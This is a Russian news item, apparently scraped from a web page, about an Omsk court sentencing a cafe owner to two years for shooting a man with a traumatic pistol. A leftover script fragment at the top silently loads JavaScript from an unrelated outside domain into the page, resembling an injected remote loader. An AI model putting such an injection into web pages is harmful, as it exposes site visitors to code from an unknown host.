, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 19 августа, 2018 года
1 декабря, 2012 Криминал

Владелец кафе, стрелявший в посетителя, получил 2 года колонии

В Омске вынесен приговор владельцу питейного заведения, выстрелившему в человека из травматического пистолета

Первомайский районный суд г. Омска вынес приговор по уголовному делу в отношении учредителя ООО «Капучино» 41-летнего Рустама Зольникова. Он признан виновным в совершении преступления, предусмотренного ч. 1 ст. 111 УК РФ (умышленное причинение тяжкого вреда здоровью).

В судебном заседании установлено, что в ночное время 30 октября 2010 года возле кафе «Капучино» Зольников, находясь в состоянии алкогольного опьянения, в ходе ссоры нанес своему оппоненту удар по спине, после чего достал травматический пистолет и выстрелил ему в живот. В результате потерпевшему был причинен тяжкий, опасный для жизни вред здоровью.

Сложность данного уголовного дела заключалась в доказывании виновности лица ввиду того, что почти все свидетели находились в подчинении у подсудимого, так как на момент совершения преступления он являлся хозяином кафе «Капучино», возле которого и произошли описываемые события.

В ходе судебного следствия по видео-конференц-связи с г. Москва были допрошены свидетели, являвшиеся непосредственными очевидцами преступления и состоявшие в приятельских отношениях с подсудимым.

Первомайский районный суд г. Омска, исследовав представленные государственным обвинителем доказательства, признал Рустама Зольникова виновным и назначил ему наказание в виде 2 лет лишения свободы в исправительной колонии общего режима.

Кроме того, суд постановил взыскать с него в пользу потерпевшего свыше 530 тыс. рублей в счет возмещения причиненного морального и материального вреда.

После оглашения приговора Зольников был взят под стражу в зале суда.

Приговор в законную силу не вступил и может быть обжалован.

http://procrf.ru/news/82800-v-omske-vyinesen-prigovor.html

Перейти к комментариям [ 0 ]

Свежие статьи из категории: Криминал